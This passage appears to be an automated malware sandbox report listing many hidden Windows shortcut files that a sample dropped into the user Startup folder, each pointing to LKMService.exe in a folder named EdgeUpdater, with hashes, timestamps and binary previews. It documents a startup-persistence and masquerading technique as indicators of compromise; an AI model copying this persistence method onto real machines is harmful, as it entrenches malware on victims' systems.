Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950901849383804
Encrypted:	false
SSDEEP:	24:8PtA3pd+E0RYgKlRNglhW8Apfv/42eVvqyFm:8Pter0RKrRvggyF
MD5:	8B12705DF0F47FA01AF82F856BC5F360
SHA1:	362D2D694C25A44CA01FB1F8A737932F165D5818
SHA-256:	E26BF71D5610EA3ECB7AFE4D0CF68DA58D9BA046E55147FFE47A15EED2AE5A7F
SHA-512:	A2EC854D76ED037A1822008B1B381DA01D1585239D82EFCFA98F591FB2540B2158F1048D605767CDA26316A0772CA1058E4051D0B727FAA19FBAF7C5571C5259
Malicious:	false
Preview:	L..................F...."...o.k.......\|.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY.=..Temp..:......CW.^BY.=....l.....................;...T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6e040945423b4a1c9b6282493afc9683.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:39 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.961711442005931
Encrypted:	false
SSDEEP:	24:8PuqOpd+E0RzegKMRNglhW8Apfv/42eVvqyFm:8P9Or0RzhrRvggyF
MD5:	D504242CA17B9EA3076AA218FAF48817
SHA1:	2685A82CD0CCCFF088BD0DEFD71DBFBDA5FBFEB6
SHA-256:	35EFC2CEA07E0CE2064B217DAC1B844751102175DCF5635E8B14BCA9BA185A00
SHA-512:	1C4CE23D49CF9DFD6E0E61C656BD917B482330C66591ACAB0B16AF77CE0CE280535DAB6499BBDB4510861C3BFA132ECA9CCF4F2D60E29DB598ED8CDA3EBD3BB6
Malicious:	false
Preview:	L..................F...."...o.k......O......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYT=..Temp..:......CW.^BYT=....l.....................Q*..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6f6ae706c0f641dd931e5d0b5ed4724b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:25 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.95174079029253
Encrypted:	false
SSDEEP:	24:8P0A3pd+E0RLgKA2RNglhW8Apfv/42eVvqyFm:8P0er0Rs2rRvggyF
MD5:	F211AA02CCBFC89A083237E2444724D1
SHA1:	4C27E6412E50EBDD42D23EBAA265C78F516066A1
SHA-256:	D630B3F4F867DB2CEA5C3379D9CD5335B3719224A02FDFCE7E96785F2B79292F
SHA-512:	1E31C57915B5349A61CD64FD018ABEDA490657316E2DBC115FC9317FE06EBFB8B714E6EF8FFC97B17469055F1DBAB2520087162F8232CE3D07847CC0C3DCBD6C
Malicious:	false
Preview:	L..................F...."...o.k.....{B\|.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY-=..Temp..:......CW.^BY-=....l......................>..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7001d526a2d647e4aaad0f739881a03a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:15 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.954569446132269
Encrypted:	false
SSDEEP:	24:8PugA3pd+E0R+gKrRNglhW8Apfv/42eVvqyFm:8Puger0RSrRvggyF
MD5:	3503DE15DACEC8B56BA91C0E5633BDD7
SHA1:	C256F27ACF0BA6993E5916646ACBDE3DCDDB436D
SHA-256:	8DBA8C3761F9839AC71A803C4F684D8104BEF18A8CEBBBF350958B5CD93D1473
SHA-512:	AC956C0E901156ADADC988B44B85D5D523A833A3DFA7F3998471C369AF5F20CF6F363F5E4ED6084741D9CFF14EF5438E1627AD25E5E1087B40F0DE0232EEEA04
Malicious:	false
Preview:	L..................F...."...o.k......(v.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_701027883f04417891ac2b92a22938b7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:43:03 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.95244172377402
Encrypted:	false
SSDEEP:	24:8PB345U34Cpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PBI5UICr0ROOxrRvggyF
MD5:	50AC9E8A74DC14E71280EBA759BD0550
SHA1:	8A32C5C140BC45B2B4E4972782F5268D21BFF183
SHA-256:	45592404AF41E2B18A9E808991E45CAA292C02A3C7BF90ADC07199FEA792960D
SHA-512:	ADB828E56E925B792D990DD14FBB63904F5CA4E51C65EA1B2C4CA65D47499D7EF746AB3E48B3E13914B3BDFB4338EB7E78C8B572B6A615130781C430DB259E27
Malicious:	false
Preview:	L..................F...."...o.k....n.(......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....n.(.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_701678ee22db428180998008f1e1e8e8.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:42 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.962791649939834
Encrypted:	false
SSDEEP:	24:8PVOpd+E0RggKpRNglhW8Apfv/42eVvqyFm:8PVOr0RarRvggyF
MD5:	6A683903D14E36F9B2C0B3F9397395D5
SHA1:	1C137D39E191E3EC4056316DED7D4B4E9357794C
SHA-256:	F92A74F910BCBF9D2C881B20CE31D9478B407B28BECB7DE3D22C09758311CD8A
SHA-512:	3532F56E7461EF02FA21923EECB4DB880C180E7212D6D0FC2BE6C704A0A3DA61EA421DDFAFBB0FA68EEAC8BA344219B039F88756A2BDAB74A665CBBD06F2F387
Malicious:	false
Preview:	L..................F...."...o.k.....t......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYV=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7ba8a225a37b42c58f6418ae64976efb.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:00 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.944852700254333
Encrypted:	false
SSDEEP:	24:8PcA3pd+E0R+gKZz2NglhW8Apfv/42eVvqyFm:8Pcer0RAzwRvggyF
MD5:	A4749D37B3980F76A1DF35B2A9887440
SHA1:	73F954D51B6C500E05B434386D1ED3E77B32E493
SHA-256:	71B30C6871C8B0DB40DEC6B7BC9BFF6B4CAF2FAC468D05CE331ED2223ECA4E74
SHA-512:	FB270B6E8BA597BC724D41D2BD9EAB8218CB28A4AB8B38304805D7F7FC727F6E911D8705FF7057D6D6EB7A7F6ABBC0A3DF494C613178E5A2AB5AC18D2603C77C
Malicious:	false
Preview:	L..................F...."...o.k....v..l.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY =..EDGEUP~1..H......BY =BY =..........................O ..E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7ca43e5a2a824b8bbf5157b7d6e81dbe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:57 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948364216373848
Encrypted:	false
SSDEEP:	24:8PwaFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PwaFr0ROOxrRvggyF
MD5:	E962C3B85E06CCC7E67C174CE6D9A5DA
SHA1:	2071B335E4F47F8E4CEF11CF7C904A73D4C25FDF
SHA-256:	BAA76E6A5E747860774A85A46C78B49D3802954B38033A7E8146F822FFFAEC72
SHA-512:	B3CFAE84C34FA5E24EDD75D8D5772387327475488DD818D5BEF28A417D5B327E50B61AF4E02265FE48A93C3FED885EBB5377AF9A0E26BB4582B00D1CC16463C4
Malicious:	false
Preview:	L..................F...."...o.k....\........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8004b617283945009c6783f0e2c79203.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:38 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.955213211128573
Encrypted:	false
SSDEEP:	24:8PJd8Opd+E0RzegKCRNglhW8Apfv/42eVvqyFm:8PJqOr0RzPrRvggyF
MD5:	6A48DE8243E1803FD444573FAF8A9359
SHA1:	23D56D0991800F71874F2E92788E35F2D03A24D0
SHA-256:	7A1E93A35F46DA97C45247E773555E1DAC51E61D7AD8717B8C531B9BCBC21C9F
SHA-512:	6C67950899ACB7638B186E45A99CE7B3C551B9CE74C3FFC926B641731952C8F98A69D804FAE6C31814CBDD1A2FA7F861D7A60363A28A904728533B174F29F189
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYT=..Temp..:......CW.^BYT=....l......................5..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_86a4598449ac48afb16cdf191fe9dd08.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:52 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948726782134276
Encrypted:	false
SSDEEP:	24:8PkA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pker0R5rRvggyF
MD5:	9425B35E60903D4C5A20D4C7C6BCE81A
SHA1:	939827D34AC773E6B5DBE5FE9A04B8ECC4D8FE99
SHA-256:	AA5F1BBC5619F1864432598E3BB82B772144E0433DE14A690883586B43442FC3
SHA-512:	DC2595AA5CBFB79751D29342F48386A33AA4848C560A34ACB7E6C65987BA31A93BDC2729440F7002483990ECA8175ED68FE8404A4E24E0047956C67C61A0CD81
Malicious:	false
Preview:	L..................F...."...o.k.............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8739b66ba2a04fd0a320fa681982b133.lnk

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:40:58 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951284383207482
Encrypted:	false
SSDEEP:	24:8P5KK+E0R7+PgKYKNglhW8Apfv/42eVvqyFm:8P5Kw0RCYsRvggyF
MD5:	82CF74F64700BC17932A01F307491B14
SHA1:	E9938AD0333845EF3359A7DF56391A73314F5AE0
SHA-256:	2305D31E5B10F9337584B66D5F14F768C87B2BC171D26E3978FF687C110878EC
SHA-512:	56F583BD259B3D2ABB99331F21194E88F59089309C086E444069731233F29DE7131EB8DDB6A47E90CB80C9CD7D24ACC993D81E0B9A21D9747BD5A7B5698C8684
Malicious:	false
Preview:	L..................F...."...o.k....o.k.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....N.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY.=..Temp..:......CW.^BY.=....l.........................T.e.m.p.....`.1.....BY =..EDGEUP~1..H......BY =BY =............................*.E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8ad77b720f9a42c8977af2705e9ddf10.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:05 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953013428891253
Encrypted:	false
SSDEEP:	24:8P9rA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8P1er0RWSRvggyF
MD5:	6CE5A5FC6116BF30C6B65907033AEBA0
SHA1:	2807B83D3278619BC820CA9D85DD6A700E1D88D4
SHA-256:	ED8B6B650EC3F52BCCED9CC307E3E034FA2D3376965D151BF0464652285CBFBA
SHA-512:	0D2445A515F45663792E6FB6DA088022747C4465504B7DA5A6DAC622BC18E2D89A550FE95AD4A5B5E1C927047DE46C6AA437AA4BFFD92A6650233DD7616FF7F9
Malicious:	false
Preview:	L..................F...."...o.k.....H.o.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b0140124cb0452e974339ee088d90b3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:49 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.948174020925792
Encrypted:	false
SSDEEP:	24:8PMA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PMer0R5rRvggyF
MD5:	1C482AE2D36F1B2E0069FAC193ACE0C2
SHA1:	A5DD1F86DCC17C6A85B376926C9D72BEAD29C142
SHA-256:	18AD7395319F9A304395979D7D848F8E137182B574BA6501FAD4780E88CEECB5
SHA-512:	2D327F66C54B1216F9C3A8DF7B4E80EA51DA7C39B9DDAABAFB93DB81A71EDF47B12E34B5B0AE3EB39DBC19CFD5DBF09D19CCADDB09674D780A2CF3877A272E3F
Malicious:	false
Preview:	L..................F...."...o.k......3......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d16c3cbece245f19a4f890c4220581c.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:36 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.944539838236798
Encrypted:	false
SSDEEP:	24:8PlA3pd+E0RdgK5RNglhW8Apfv/42eVvqyFm:8Pler0RfrRvggyF
MD5:	A60150A2742016D8D8FD6DCA6CE32BBF
SHA1:	DBC569891F8218107715228B3C7EDE3F08648A7F
SHA-256:	5B0968A57774449D64E01B45F1780A943AFC997EB2EAE66E4A284E8389B4592B
SHA-512:	E8109880B3EECF4157105A6B461BF78BF808AE4956057C3C5E28DC530DC44197EC1573AD7429331A4FA3821B0B13C83A6B3D12ECA299F8D922966DB40B538E39
Malicious:	false
